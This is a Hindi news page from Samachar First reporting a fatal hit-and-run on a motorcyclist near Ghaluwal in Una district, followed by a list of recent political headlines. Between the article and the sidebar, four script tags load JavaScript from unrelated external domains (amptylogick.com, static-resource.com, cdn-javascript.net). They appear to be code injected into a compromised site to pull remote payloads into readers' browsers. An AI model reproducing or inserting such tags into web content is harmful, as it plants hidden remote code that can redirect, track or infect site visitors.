ऊनाः अज्ञात वाहन ने बाइक को मारी टक्कर, मौत

<p>जिला ऊना के पुलिस थाना हरोली के तहत घालूवाल में अज्ञात वाहन की चपेट में आने से बाइक सवार की मौत हो गयी। मृतक की पहचान सुरिंदर कुमार पुत्र महेंद्र सिंह निवासी लुधियाना के रुओ में हुई है। पुलिस ने शव को कब्जे में लेकर पोस्टमार्टम के लिए भेज दिया है। पुलिस ने आगामी कार्रवाई शुरू कर दी है। अज्ञात वाहन के बारे में कोई सुराग नहीं लग पाया है। जानकारी के अनुसार देर रात घालूवाल के पास एक बाइक चालक को टक्&zwj;कर मारकर कोई अज्ञात वाहन फरार हो गया है। सूचना मिलने के काफी देर बाद पुलिस के पहुंचने पर लोगों में आक्रोश दिखा।</p>

<p>कुछ लोगों का कहना था था कि टिप्पर की चपेट में आने से यह बाइक सवार गिर गया और दूसरी गाड़ी के नीचे आ गया। अब पुलिस सीसीटीवी कैमरा की फुटेज खंगाल रही है। हादसा देर रात का है। राहगीरों ने बाइक सवार को देखा तो वह बेसुध था। पुलिस ने मौके पर आकर देखा तो उसकी मौत हो चुकी थी। पुलिस ने शव को पोस्&zwj;टमार्टम के लिए अस्&zwj;पताल पहुंचाया है। मृतक के परिवार के सदस्&zwj;यों को सूचित कर दिया है। पुलिस मामले की जांच कर रही है। एसपी दिवाकर शर्मा ने कहा कि मामले की जांच की जा रही है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1574571061135″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

जनता पेयजल को तरसती रही, राजेंद्र राणा सरकार गिराने की साजिश रचते रहे

-मुख्यमंत्री सुखविंदर सुक्खू ने राणा की गृह पंचायत की पेयजल समस्या सुलझाई -कैप्टन रणजीत सिंह…

2 hours ago

सुजानपुर में भाजपा को कुनबा संभालना हो रहा मुश्किल

मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू की नीतियों में आस्था जता रहे भाजपाई  मतदान की तारीख…

2 hours ago

मुख्य निर्वाचन अधिकारी ने राज्य नोडल अधिकारियों के साथ की मीटिंग

मुख्य निर्वाचन अधिकारी, मनीष गर्ग ने आज यहां सभी राज्य नोडल अधिकारियों को चुनाव व्यय…

2 hours ago

संसदीय क्षेत्रों में 3 और विस उप-चुनावों के लिए 4 नामांकनों की वापसी

निर्वाचन विभाग के एक प्रवक्ता ने आज यहां जानकारी दी कि आगामी लोकसभा तथा विधानसभा…

3 hours ago

मुल्थान जैसे घटनाएं रोकने को गंभीर प्रयास करे प्रदेश सरकार, जांच हो: आनंद शर्मा

धर्मशाला(कांगड़ा), 17 मई: जिला कांगड़ा के दुर्गम क्षेत्र मुल्थान में एक पनबिजली परियोजना की टनल…

18 hours ago

जनसेवा नहीं, धन सेवा के लिए राजनीति कर रहे राजेंद्र राणा: मुख्यमंत्री

सुजानपुर: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने कहा कि सुजानपुर के पूर्व विधायक राजेंद्र राणा…

18 hours ago